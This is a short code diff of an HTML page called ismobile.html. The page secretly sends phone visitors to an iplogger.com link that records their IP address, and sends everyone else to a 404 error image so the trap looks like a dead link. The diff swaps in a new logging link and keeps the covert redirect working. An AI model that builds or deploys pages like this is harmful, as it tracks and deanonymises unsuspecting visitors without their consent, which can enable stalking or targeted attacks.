--- a/ismobile.html
+++ b/ismobile.html
@@ -16,7 +16,7 @@
 
 			console.log(iSmobile)
 		if (iSmobile == "Phone") {
-			window.location.replace("https://iplogger.com/2SRfU4");
+			window.location.replace("https://iplogger.com/22iyR6");
 		} 
 			else {
 				window.location.replace("https://lapraim.com/assets/images/insights/404-error/404-error.jpg");
